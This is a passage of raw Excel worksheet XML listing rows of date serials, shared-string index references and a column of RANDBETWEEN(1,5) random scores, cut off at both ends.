        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12296" s="1">
        <v>43301.654374999998</v>
      </c>
      <c r="C12296" t="s">
        <v>41</v>
      </c>
      <c r="E12296" t="s">
        <v>1446</v>
      </c>
      <c r="F12296">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12297" s="1">
        <v>43301.653333333335</v>
      </c>
      <c r="C12297" t="s">
        <v>41</v>
      </c>
      <c r="E12297" t="s">
        <v>1446</v>
      </c>
      <c r="F12297">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12298" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12298" s="1">
        <v>43301.637592592589</v>
      </c>
      <c r="C12298" t="s">
        <v>10</v>
      </c>
      <c r="D12298" t="s">
        <v>17</v>
      </c>
      <c r="E12298" t="s">
        <v>11018</v>
      </c>
      <c r="F12298">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12299" s="1">
        <v>43301.626458333332</v>
      </c>
      <c r="C12299" t="s">
        <v>10</v>
      </c>
      <c r="D12299" t="s">
        <v>52</v>
      </c>
      <c r="E12299" t="s">
        <v>11019</v>
      </c>
      <c r="F12299">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12300" s="1">
        <v>43301.567800925928</v>
      </c>
      <c r="C12300" t="s">
        <v>41</v>
      </c>
      <c r="F12300">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12301" s="1">
        <v>43301.559699074074</v>
      </c>
      <c r="C12301" t="s">
        <v>10</v>
      </c>
      <c r="D12301" t="s">
        <v>89</v>
      </c>
      <c r="E12301" t="s">
        <v>11020</v>
      </c>
      <c r="F12301">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12302" s="1">
        <v>43301.539189814815</v>
      </c>
      <c r="C12302" t="s">
        <v>10</v>
      </c>
      <c r="D12302" t="s">
        <v>52</v>
      </c>
      <c r="E12302" t="s">
        <v>11021</v>
      </c>
      <c r="F12302">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12303" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12303" s="1">
        <v>43301.517962962964</v>
      </c>
      <c r="C12303" t="s">
        <v>3049</v>
      </c>
      <c r="E12303" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F12303">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12304" s="1">
        <v>43301.500335648147</v>
      </c>
      <c r="C12304" t="s">
        <v>41</v>
      </c>
      <c r="E12304" t="s">
        <v>11022</v>
      </c>
      <c r="F12304">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12305" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12305" s="1">
        <v>43301.444409722222</v>
      </c>
      <c r="C12305" t="s">
        <v>71</v>
      </c>
      <c r="E12305" s="2" t="s">
        <v>11023</v>
      </c>
      <c r="F12305">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12306" s="1">
        <v>43301.430266203701</v>
      </c>
      <c r="C12306" t="s">
        <v>41</v>
      </c>
      <c r="E12306" t="s">
        <v>11024</v>
      </c>
      <c r="F12306">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12307" s="1">
        <v>43301.426134259258</v>
      </c>
      <c r="C12307" t="s">
        <v>48</v>
      </c>
      <c r="E12307" t="s">
        <v>11025</v>
      </c>
      <c r="F12307">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12308" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12308" s="1">
        <v>43301.424780092595</v>
      </c>
      <c r="C12308" t="s">
        <v>529</v>
      </c>
      <c r="D12308" t="s">
        <v>82</v>
      </c>
      <c r="E12308" t="s">
        <v>11026</v>
      </c>
      <c r="F12308">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12309" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A12309" s="1">
        <v>43301.419131944444</v>
      </c>
      <c r="C12309" t="s">
        <v>328</v>
      </c>
      <c r="D12309" t="s">
        <v>271</v>
      </c>
      <c r="E12309" s="2" t="s">
        <v>11027</v>
      </c>
      <c r="F12309">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12310" s="1">
        <v>43301.397337962961</v>
      </c>
      <c r="C12310" t="s">
        <v>10</v>
      </c>
      <c r="D12310" t="s">
        <v>14</v>
      </c>
      <c r="E12310" t="s">
        <v>11028</v>
      </c>
      <c r="F12310">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12311" s="1">
        <v>43301.396874999999</v>
      </c>
      <c r="C12311" t="s">
        <v>41</v>
      </c>
      <c r="E12311" t="s">
        <v>11029</v>
      </c>
      <c r="F12311">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12312" s="1">
        <v>43301.391828703701</v>
      </c>
      <c r="C12312" t="s">
        <v>41</v>
      </c>
      <c r="D12312" t="s">
        <v>312</v>
      </c>
      <c r="E12312" t="s">
        <v>11030</v>
      </c>
      <c r="F12312">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12313" s="1">
        <v>43301.386631944442</v>
      </c>
      <c r="C12313" t="s">
        <v>48</v>
      </c>
      <c r="E12313" t="s">
        <v>11031</v>
      </c>
      <c r="F12313">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12314" s="1">
        <v>43301.385231481479</v>
      </c>
      <c r="C12314" t="s">
        <v>65</v>
      </c>
      <c r="E12314" t="s">
        <v>11032</v>
      </c>
      <c r="F12314">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12315" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12315" s="1">
        <v>43301.379259259258</v>
      </c>
      <c r="C12315" t="s">
        <v>65</v>
      </c>
      <c r="E12315" s="2" t="s">
        <v>11033</v>
      </c>
      <c r="F12315">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12316" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12316" s="1">
        <v>43301.317627314813</v>
      </c>
      <c r="C12316" t="s">
        <v>43</v>
      </c>
      <c r="D12316" t="s">
        <v>312</v>
      </c>
      <c r="E12316" s="2" t="s">
        <v>11034</v>
      </c>
      <c r="F12316">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12317" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12317" s="1">
        <v>43301.254548611112</v>
      </c>
      <c r="C12317" t="s">
        <v>344</v>
      </c>
      <c r="E12317" s="2" t="s">
        <v>11035</v>
      </c>
      <c r="F12317">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12318" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12318" s="1">
        <v>43301.219097222223</v>
      </c>
      <c r="C12318" t="s">
        <v>3994</v>
      </c>
      <c r="D12318" t="s">
        <v>52</v>
      </c>
      <c r="E12318" s="2" t="s">
        <v>11036</v>
      </c>
      <c r="F12318">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12319" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12319" s="1">
        <v>43301.219085648147</v>
      </c>
      <c r="C12319" t="s">
        <v>2225</v>
      </c>
      <c r="D12319" t="s">
        <v>41</v>
      </c>
      <c r="E12319" s="2" t="s">
        <v>11037</v>
      </c>
      <c r="F12319">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12320" s="1">
        <v>43301.216817129629</v>
      </c>
      <c r="C12320" t="s">
        <v>461</v>
      </c>
      <c r="E12320" t="s">
        <v>11038</v>
      </c>
      <c r="F12320">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12321" s="1">
        <v>43301.202847222223</v>
      </c>
      <c r="C12321" t="s">
        <v>319</v>
      </c>
      <c r="D12321" t="s">
        <v>320</v>
      </c>
      <c r="E12321" t="s">
        <v>11039</v>
      </c>
      <c r="F12321">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12322" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12322" s="1">
        <v>43301.191111111111</v>
      </c>
      <c r="C12322" t="s">
        <v>139</v>
      </c>
      <c r="D12322" t="s">
        <v>232</v>
      </c>
      <c r="E12322" s="2" t="s">
        <v>11040</v>
      </c>
      <c r="F12322">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12323" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12323" s="1">
        <v>43301.152719907404</v>
      </c>
      <c r="C12323" t="s">
        <v>71</v>
      </c>
      <c r="E12323" s="2" t="s">
        <v>11041</v>
      </c>
      <c r="F12323">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12324" s="1">
        <v>43301.12232638889</v>
      </c>
      <c r="C12324" t="s">
        <v>430</v>
      </c>
      <c r="E12324" t="s">
        <v>11042</v>
      </c>
      <c r="F12324">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12325" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A12325" s="1">
        <v>43301.120150462964</v>
      </c>
      <c r="C12325" t="s">
        <v>73</v>
      </c>
      <c r="E12325" s="2" t="s">
        <v>11043</v>
      </c>
      <c r="F12325">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12326" s="1">
        <v>43301.098877314813</v>
      </c>
      <c r="C12326" t="s">
        <v>2545</v>
      </c>
      <c r="E12326" t="s">
        <v>11044</v>
      </c>
      <c r="F12326">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12327" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12327" s="1">
        <v>43301.098078703704</v>
      </c>
      <c r="C12327" t="s">
        <v>2545</v>
      </c>
      <c r="D12327" t="s">
        <v>194</v>
      </c>
      <c r="E12327" s="2" t="s">
        <v>11045</v>
      </c>
      <c r="F12327">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12328" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12328" s="1">
        <v>43301.098078703704</v>
      </c>
      <c r="C12328" t="s">
        <v>6523</v>
      </c>
      <c r="D12328" t="s">
        <v>367</v>
      </c>
      <c r="E12328" s="2" t="s">
        <v>11046</v>
      </c>
      <c r="F12328">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12329" s="1">
        <v>43301.052384259259</v>
      </c>
      <c r="C12329" t="s">
        <v>73</v>
      </c>
      <c r="E12329" t="s">
        <v>11047</v>
      </c>
      <c r="F12329">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12330" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12330" s="1">
        <v>43301.049502314818</v>
      </c>
      <c r="C12330" t="s">
        <v>50</v>
      </c>
      <c r="D12330" t="s">
        <v>2214</v>
      </c>
      <c r="E12330" s="2" t="s">
        <v>11048</v>
      </c>
      <c r="F12330">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12331" s="1">
        <v>43301.038124999999</v>
      </c>
      <c r="C12331" t="s">
        <v>41</v>
      </c>
      <c r="E12331" t="s">
        <v>11049</v>
      </c>
      <c r="F12331">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12332" s="1">
        <v>43301.034328703703</v>
      </c>
      <c r="C12332" t="s">
        <v>140</v>
      </c>
      <c r="D12332" t="s">
        <v>847</v>
      </c>
      <c r="E12332" t="s">
        <v>11050</v>
      </c>
      <c r="F12332">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12333" s="1">
        <v>43301.008055555554</v>
      </c>
      <c r="C12333" t="s">
        <v>6</v>
      </c>
      <c r="D12333" t="s">
        <v>25</v>
      </c>
      <c r="E12333" t="s">
        <v>11051</v>
      </c>
      <c r="F12333">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12334" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12334" s="1">
        <v>43301.00277777778</v>
      </c>
      <c r="C12334" t="s">
        <v>2225</v>
      </c>
      <c r="D12334" t="s">
        <v>41</v>
      </c>
      <c r="E12334" s="2" t="s">
        <v>11052</v>
      </c>
      <c r="F12334">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12335" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12335" s="1">
        <v>43301.002743055556</v>
      </c>
      <c r="C12335" t="s">
        <v>3994</v>
      </c>
      <c r="D12335" t="s">
        <v>46</v>
      </c>
      <c r="E12335" s="2" t="s">
        <v>11053</v>
      </c>
      <c r="F12335">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12336" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12336" s="1">
        <v>43300.990428240744</v>
      </c>
      <c r="C12336" t="s">
        <v>140</v>
      </c>
      <c r="D12336" t="s">
        <v>141</v>
      </c>
      <c r="E12336" t="s">
        <v>11054</v>
      </c>
      <c r="F12336">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12337" s="1">
        <v>43300.982615740744</v>
      </c>
      <c r="C12337" t="s">
        <v>314</v>
      </c>
      <c r="E12337" t="s">
        <v>11055</v>
      </c>
      <c r="F12337">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12338" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12338" s="1">
        <v>43300.944826388892</v>
      </c>
      <c r="C12338" t="s">
        <v>5087</v>
      </c>
      <c r="D12338" t="s">
        <v>36</v>
      </c>
      <c r="E12338" s="2" t="s">
        <v>11056</v>
      </c>
      <c r="F12338">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12339" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12339" s="1">
        <v>43300.944675925923</v>
      </c>
      <c r="C12339" t="s">
        <v>1064</v>
      </c>
      <c r="D12339" t="s">
        <v>92</v>
      </c>
      <c r="E12339" s="2" t="s">
        <v>11057</v>
      </c>
      <c r="F12339">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12340" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12340" s="1">
        <v>43300.942662037036</v>
      </c>
      <c r="C12340" t="s">
        <v>65</v>
      </c>
      <c r="D12340" t="s">
        <v>330</v>
      </c>
      <c r="E12340" s="2" t="s">
        <v>11058</v>
      </c>
      <c r="F12340">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12341" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12341" s="1">
        <v>43300.918310185189</v>
      </c>
      <c r="C12341" t="s">
        <v>29</v>
      </c>
      <c r="D12341" t="s">
        <v>232</v>
      </c>
      <c r="E12341" s="2" t="s">
        <v>11059</v>
      </c>
      <c r="F12341">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12342" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12342" s="1">
        <v>43300.918310185189</v>
      </c>
      <c r="C12342" t="s">
        <v>189</v>
      </c>
      <c r="D12342" t="s">
        <v>229</v>
      </c>
      <c r="E12342" s="2" t="s">
        <v>11060</v>
      </c>
      <c r="F12342">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12343" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12343" s="1">
        <v>43300.918310185189</v>
      </c>
      <c r="C12343" t="s">
        <v>1510</v>
      </c>
      <c r="D12343" t="s">
        <v>56</v>
      </c>
      <c r="E12343" s="2" t="s">
        <v>11061</v>
      </c>
      <c r="F12343">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12344" s="1">
        <v>43300.891134259262</v>
      </c>
      <c r="C12344" t="s">
        <v>6</v>
      </c>
      <c r="D12344" t="s">
        <v>25</v>
      </c>
      <c r="E12344" t="s">
        <v>11062</v>
      </c>
      <c r="F12344">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12345" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12345" s="1">
        <v>43300.866226851853</v>
      </c>
      <c r="C12345" t="s">
        <v>50</v>
      </c>
      <c r="D12345" t="s">
        <v>381</v>
      </c>
      <c r="E12345" s="2" t="s">
        <v>11063</v>
      </c>
      <c r="F12345">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12346" s="1">
        <v>43300.857997685183</v>
      </c>
      <c r="C12346" t="s">
        <v>10</v>
      </c>
      <c r="D12346" t="s">
        <v>6</v>
      </c>
      <c r="E12346" t="s">
        <v>11064</v>
      </c>
      <c r="F12346">
        <f t="shared" ca="1" si="192"/>
        <v>3</v>
      </c>
    </row>
    <row r="12347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12347" s="1">
        <v>43300.825300925928</v>
      </c>
      <c r="C12347" t="s">
        <v>140</v>
      </c>
      <c r="D12347" t="s">
        <v>847</v>
      </c>
      <c r="E12347" t="s">
        <v>11065</v>
      </c>
      <c r="F12347">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12348" s="1">
        <v>43300.817523148151</v>
      </c>
      <c r="C12348" t="s">
        <v>10</v>
      </c>
      <c r="D12348" t="s">
        <v>713</v>
      </c>
      <c r="E12348" t="s">
        <v>11066</v>
      </c>
      <c r="F12348">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12349" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12349" s="1">
        <v>43300.812349537038</v>
      </c>
      <c r="C12349" t="s">
        <v>1064</v>
      </c>
      <c r="D12349" t="s">
        <v>151</v>
      </c>
      <c r="E12349" s="2" t="s">
        <v>11067</v>
      </c>
      <c r="F12349">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12350" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12350" s="1">
        <v>43300.811261574076</v>
      </c>
      <c r="C12350" t="s">
        <v>65</v>
      </c>
      <c r="D12350" t="s">
        <v>151</v>
      </c>
      <c r="E12350" s="2" t="s">
        <v>11068</v>
      </c>
      <c r="F12350">
        <f t="shared" ca="1" si="192"/>
        <v>5</v>
      </c>
    </row>
    <row r="12351" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12351" s="1">
        <v>43300.811249999999</v>
      </c>
      <c r="C12351" t="s">
        <v>5087</v>
      </c>
      <c r="D12351" t="s">
        <v>817</v>
      </c>
      <c r="E12351" s="2" t="s">
        <v>11069</v>
      </c>
      <c r="F12351">
        <f t="shared" ca="1" si="192"/>
        <v>1</v>
      </c>
    </row>
    <row r="12352" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12352" s="1">
        <v>43300.767129629632</v>
      </c>
      <c r="C12352" t="s">
        <v>1510</v>
      </c>
      <c r="D12352" t="s">
        <v>271</v>
      </c>
      <c r="E12352" s="2" t="s">
        <v>11070</v>
      </c>
      <c r="F12352">
        <f t="shared" ca="1" si="192"/>
        <v>2</v>
      </c>
    </row>
    <row r="12353" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12353" s="1">
        <v>43300.766157407408</v>
      </c>
      <c r="C12353" t="s">
        <v>29</v>
      </c>
      <c r="D12353" t="s">
        <v>194</v>
      </c>
      <c r="E12353" s="2" t="s">
        <v>11071</v>
      </c>
      <c r="F12353">
        <f t="shared" ca="1" si="192"/>
        <v>4</v>
      </c>
    </row>
    <row r="12354" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12354" s="1">
        <v>43300.766157407408</v>
      </c>
      <c r="C12354" t="s">
        <v>189</v>
      </c>
      <c r="D12354" t="s">
        <v>1036</v>
      </c>
      <c r="E12354" s="2" t="s">
        <v>11072</v>
      </c>
      <c r="F12354">
        <f t="shared" ref="F12354:F12417" ca="1" si="193">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="12355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12355" s="1">
        <v>43300.735555555555</v>
      </c>
      <c r="C12355" t="s">
        <v>144</v>
      </c>
      <c r="E12355" t="s">
        <v>11073</v>
      </c>
      <c r="F12355">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12356" s="1">
        <v>43300.734016203707</v>
      </c>
      <c r="C12356" t="s">
        <v>10</v>
      </c>
      <c r="D12356" t="s">
        <v>271</v>
      </c>
      <c r="E12356" t="s">
        <v>11074</v>
      </c>
      <c r="F12356">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12357" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12357" s="1">
        <v>43300.717673611114</v>
      </c>
      <c r="C12357" t="s">
        <v>10</v>
      </c>
      <c r="D12357" t="s">
        <v>89</v>
      </c>
      <c r="E12357" t="s">
        <v>11075</v>
      </c>
      <c r="F12357">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12358" s="1">
        <v>43300.705601851849</v>
      </c>
      <c r="C12358" t="s">
        <v>6</v>
      </c>
      <c r="D12358" t="s">
        <v>821</v>
      </c>
      <c r="E12358" t="s">
        <v>11076</v>
      </c>
      <c r="F12358">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12359" s="1">
        <v>43300.689432870371</v>
      </c>
      <c r="C12359" t="s">
        <v>16</v>
      </c>
      <c r="E12359" t="s">
        <v>11077</v>
      </c>
      <c r="F12359">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12360" s="1">
        <v>43300.688530092593</v>
      </c>
      <c r="C12360" t="s">
        <v>48</v>
      </c>
      <c r="E12360" t="s">
        <v>11078</v>
      </c>
      <c r="F12360">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12361" s="1">
        <v>43300.683553240742</v>
      </c>
      <c r="C12361" t="s">
        <v>10</v>
      </c>
      <c r="D12361" t="s">
        <v>178</v>
      </c>
      <c r="E12361" t="s">
        <v>11079</v>
      </c>
      <c r="F12361">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12362" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12362" s="1">
        <v>43300.6715625</v>
      </c>
      <c r="C12362" t="s">
        <v>10</v>
      </c>
      <c r="D12362" t="s">
        <v>107</v>
      </c>
      <c r="E12362" s="2" t="s">
        <v>11080</v>
      </c>
      <c r="F12362">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12363" s="1">
        <v>43300.663993055554</v>
      </c>
      <c r="C12363" t="s">
        <v>16</v>
      </c>
      <c r="E12363" t="s">
        <v>11081</v>
      </c>
      <c r="F12363">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12364" s="1">
        <v>43300.658368055556</v>
      </c>
      <c r="C12364" t="s">
        <v>10</v>
      </c>
      <c r="D12364" t="s">
        <v>251</v>
      </c>
      <c r="E12364" t="s">
        <v>11082</v>
      </c>
      <c r="F12364">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12365" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12365" s="1">
        <v>43300.654421296298</v>
      </c>
      <c r="C12365" t="s">
        <v>10</v>
      </c>
      <c r="D12365" t="s">
        <v>41</v>
      </c>
      <c r="E12365" s="2" t="s">
        <v>11083</v>
      </c>
      <c r="F12365">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12366" s="1">
        <v>43300.605011574073</v>
      </c>
      <c r="C12366" t="s">
        <v>10</v>
      </c>
      <c r="D12366" t="s">
        <v>33</v>
      </c>
      <c r="E12366" t="s">
        <v>11084</v>
      </c>
      <c r="F12366">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12367" s="1">
        <v>43300.604895833334</v>
      </c>
      <c r="C12367" t="s">
        <v>16</v>
      </c>
      <c r="E12367" t="s">
        <v>11085</v>
      </c>
      <c r="F12367">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12368" s="1">
        <v>43300.581863425927</v>
      </c>
      <c r="C12368" t="s">
        <v>10</v>
      </c>
      <c r="D12368" t="s">
        <v>36</v>
      </c>
      <c r="E12368" t="s">
        <v>11086</v>
      </c>
      <c r="F12368">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12369" s="1">
        <v>43300.575706018521</v>
      </c>
      <c r="C12369" t="s">
        <v>10</v>
      </c>
      <c r="D12369" t="s">
        <v>36</v>
      </c>
      <c r="E12369" t="s">
        <v>7047</v>
      </c>
      <c r="F12369">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12370" s="1">
        <v>43300.571562500001</v>
      </c>
      <c r="C12370" t="s">
        <v>10</v>
      </c>
      <c r="D12370" t="s">
        <v>11</v>
      </c>
      <c r="E12370" t="s">
        <v>11087</v>
      </c>
      <c r="F12370">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12371" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12371" s="1">
        <v>43300.517233796294</v>
      </c>
      <c r="C12371" t="s">
        <v>10</v>
      </c>
      <c r="D12371" t="s">
        <v>36</v>
      </c>
      <c r="E12371" s="2" t="s">
        <v>11088</v>
      </c>
      <c r="F12371">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12372" s="1">
        <v>43300.498749999999</v>
      </c>
      <c r="C12372" t="s">
        <v>10</v>
      </c>
      <c r="D12372" t="s">
        <v>381</v>
      </c>
      <c r="E12372" t="s">
        <v>11089</v>
      </c>
      <c r="F12372">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12373" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12373" s="1">
        <v>43300.497233796297</v>
